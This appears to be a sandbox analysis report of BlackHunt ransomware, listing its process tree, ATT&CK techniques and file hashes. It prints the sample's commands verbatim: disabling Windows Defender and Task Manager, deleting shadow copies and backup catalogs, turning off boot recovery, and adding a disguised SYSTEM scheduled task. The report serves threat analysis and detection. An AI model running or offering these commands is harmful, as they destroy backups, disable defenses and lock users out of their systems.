C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1084
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1092
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:620
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1900
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1336
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2140
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1088
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2188
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe" /F2⤵PID:1748
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe" /F3⤵
- Creates scheduled task(s)
- Modifies registry class
PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2928
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2060
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2788
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1800
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2016
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:948
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1864
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:436
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1780
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1540
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2260
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2664
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1732
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5678e112ae60efffbdc3daf96855c4239
SHA10d240418e9e82a8cc667292b29794867f09fa1da
SHA25668f8b6f39dc10a2013eea1b72ae93f24d86e33456348e9a7e08054e12ce2b271
SHA512784cf8f52feb824149276d7391270e007c296bb6e4b262493fc08a1c5e3a97e0c42b7aeabda893cd22442b145b1210b80f0bf51f33fc6b642195c2c2b614bb90
-
Filesize
12KB
MD5fead0b04e12394917c9e7cbf85a4911d
SHA1cfd5744a820618c59d6dae00ba0c9bd310a031ba
SHA256b566f81569cb5dbd817cd95b9f27e55550396a971907ba2a1cdb5ef89202439e
SHA51268e7f4eefd9f9b48eb46f42137e5a5325346af1daafe56e085f5d69c0a2bc92ca833d57128a564167713b3575eed3e8e4d6983156e9fc1083166012a4aecb562
-
Filesize
684B
MD5611352a2d76e82509b9f8c071e05cdb8
SHA192d8e18105d313cf3d1d13ea8247cb36a16086a4
SHA2565c5807e872e26f02fee07c57a498760a291118efacc05c447f87ace63493afcb
SHA512df05bcf7bfb260f1b90586902ffb21027dfbd2ebb6336ef0c3c0f3d20b3dc1ec5ebb2f57973ae9ef99e37c0e632fe1e9b2c9d1a0dde9d031dcbc1e0fdc544088